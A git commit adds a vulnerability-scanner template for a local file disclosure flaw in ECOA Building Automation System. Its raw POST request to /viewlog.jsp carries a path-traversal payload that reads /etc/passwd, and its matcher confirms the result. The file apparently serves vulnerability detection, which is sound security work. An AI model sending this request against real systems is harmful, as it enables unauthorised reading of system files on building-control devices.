Merge pull request #2664 from Akokonunes/patch-37

Create ecoa-building-automation-lfd.yaml
2021-09-17 16:47:54 +05:30 · 2021-09-17 16:47:54 +05:30 · 3deb522abc
parent a866f1e777 df59ad5670
commit 3deb522abc
1 changed files with 27 additions and 0 deletions
--- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml
+++ b/vulnerabilities/other/ecoa-building-automation-lfd.yaml
@ -0,0 +1,27 @@
+id: ecoa-building-automation-lfd
+info:
+  name: ECOA Building Automation System - LFD
+  author: 0x_Akoko
+  severity: high
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
+  tags: ecoa,lfi
+
+requests:
+  - raw:
+      - |
+        POST /viewlog.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+        yr=2021&mh=6&fname=../../../../../../../../etc/passwd
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200